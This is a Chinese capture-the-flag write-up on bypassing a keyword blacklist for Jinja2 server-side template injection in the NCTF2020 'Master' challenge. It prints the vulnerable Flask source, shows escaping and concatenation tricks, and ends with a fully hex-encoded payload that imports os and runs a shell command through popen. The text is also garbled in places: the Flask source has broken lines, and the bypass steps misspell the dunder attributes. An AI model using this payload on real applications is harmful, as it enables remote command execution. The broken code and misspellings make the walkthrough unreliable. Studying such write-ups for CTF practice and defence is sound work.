SSTI注⼊绕过-Jinjia2模板
题⽬选⾃NCTF2020的Master
源码如下:
from jinja2 import Template
from flask import Flask,request
app = Flask(__name__)
@ute("/")
def index():
name = ('name','guest')
blacklist =['%','-',':','+','class','ba','mro','_','config','args','init','global','.','\'','req',
'|','attr','get']
for i in blacklist:
if i in name:
return Template('你真是个⼩可爱').render()
t = Template("早安,打⼯⼈<br/>你就是我的"+ name +"吗?<br/><!-- ?name=master -->")
der()
if __name__ =="__main__":
app.run()
01 过滤了很多东西,写题时,可以使⽤burp来找到过滤词
02 以下为绕过思路:
1. 原语句为:().__class__.__bas__[0].__subclass__()
2. 过滤了点号,使⽤[" "]代替:()["__class__"]["__bas__"][0]["__subclass__"]()
3. 过滤了下划线,使⽤⼗六进制\x5f代替:()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbas\x5f\x5f"][0]["\x5f\x5fsubclass\x5f\x5f"]()
4. 过滤了关键字,采⽤字符串拼接:()["\x5f\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fbas"+"es\x5f\x5f"][0]["\x5f\x5fsubc"+"lass\x5f\x5f"]()
5. 成功过滤
6. 不过这题⾮预期了,因为本来加号在⿊名单内,但是在字符串拼接时,加号会直接跑了。可以直接全部16进制绕过,这只能在SSTI中
使⽤
全16进制Payload(⽹上找的):name={{""["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"]["\x5f\x5f\x62\x61\x73\x65\x5f\x5f"]
["\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f"]()[64]["\x5f\x5f\x69\x6e\x69\x74\x5f\x5f"]["\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f"] ["\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f"]["\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f"]("\x6f\x73")["\x70\x6f\x70\x65\x6e"]("ls")["\x72\x65\x61\x64"] ()}}
